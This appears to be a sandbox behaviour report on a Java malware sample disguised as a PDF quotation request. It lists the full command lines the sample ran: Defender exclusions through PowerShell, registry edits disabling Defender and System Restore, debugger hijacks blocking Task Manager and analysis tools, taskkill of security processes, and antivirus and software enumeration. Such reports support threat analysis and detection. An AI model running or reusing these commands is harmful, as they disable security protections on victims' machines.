PID 3440 wrote to memory of 3752	3440	cmd.exe	354
PID 424 wrote to memory of 3956	424	java.exe	355
PID 424 wrote to memory of 3956	424	java.exe	355
PID 3956 wrote to memory of 2204	3956	cmd.exe	357
PID 3956 wrote to memory of 2204	3956	cmd.exe	357
PID 424 wrote to memory of 3836	424	java.exe	358
PID 424 wrote to memory of 3836	424	java.exe	358
PID 3956 wrote to memory of 3084	3956	cmd.exe	360
PID 3956 wrote to memory of 3084	3956	cmd.exe	360
PID 424 wrote to memory of 3456	424	java.exe	361
PID 424 wrote to memory of 3456	424	java.exe	361
PID 3456 wrote to memory of 4192	3456	cmd.exe	363
PID 3456 wrote to memory of 4192	3456	cmd.exe	363
PID 3456 wrote to memory of 4248	3456	cmd.exe	364
PID 3456 wrote to memory of 4248	3456	cmd.exe	364
PID 424 wrote to memory of 4212	424	java.exe	365
PID 424 wrote to memory of 4212	424	java.exe	365
PID 4212 wrote to memory of 4604	4212	cmd.exe	367
PID 4212 wrote to memory of 4604	4212	cmd.exe	367
PID 4212 wrote to memory of 4596	4212	cmd.exe	368
PID 4212 wrote to memory of 4596	4212	cmd.exe	368
PID 424 wrote to memory of 4752	424	java.exe	369
PID 424 wrote to memory of 4752	424	java.exe	369
PID 4752 wrote to memory of 4416	4752	cmd.exe	371
PID 4752 wrote to memory of 4416	4752	cmd.exe	371
PID 4752 wrote to memory of 4484	4752	cmd.exe	372
PID 4752 wrote to memory of 4484	4752	cmd.exe	372
PID 424 wrote to memory of 3516	424	java.exe	373
PID 424 wrote to memory of 3516	424	java.exe	373
PID 424 wrote to memory of 4636	424	java.exe	375
PID 424 wrote to memory of 4636	424	java.exe	375
PID 424 wrote to memory of 3028	424	java.exe	377
PID 424 wrote to memory of 3028	424	java.exe	377
PID 424 wrote to memory of 4768	424	java.exe	379
PID 424 wrote to memory of 4768	424	java.exe	379
PID 424 wrote to memory of 3348	424	java.exe	381
PID 424 wrote to memory of 3348	424	java.exe	381
PID 424 wrote to memory of 4652	424	java.exe	383
PID 424 wrote to memory of 4652	424	java.exe	383
PID 424 wrote to memory of 4668	424	java.exe	385
PID 424 wrote to memory of 4668	424	java.exe	385
PID 424 wrote to memory of 4272	424	java.exe	387
PID 424 wrote to memory of 4272	424	java.exe	387
PID 424 wrote to memory of 1804	424	java.exe	389
PID 424 wrote to memory of 1804	424	java.exe	389

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3276	attrib.exe
4020	attrib.exe
1908	attrib.exe
3640	attrib.exe
612	attrib.exe
2208	attrib.exe
3972	attrib.exe
3912	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:424
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3984
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3640
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:612
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2208
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3972
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:3912
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:3276
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:4020
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1908
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3832
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:724
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1620
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3848
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1992
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3720
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3716
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3884
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:3808
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2792
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4120
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:4132
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4240
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:4276
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4312
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:4432
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4452
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4556
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4652
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4664
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4780
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:4884
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4896
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:5008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:5080
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4092
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:700
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2896
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:4248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:336
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4204
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4136
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4760
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:4868
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:4276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4872
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4936
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:4600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:4512
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:4592
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:4824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:5016
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:4932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:5036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:4676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:5052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4912
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:5056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3648
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:3816
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:3092
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:2792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:3032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4120
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4420
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:5044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4476
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4952
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4896
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:5040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:5084
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:700
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4144
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:336
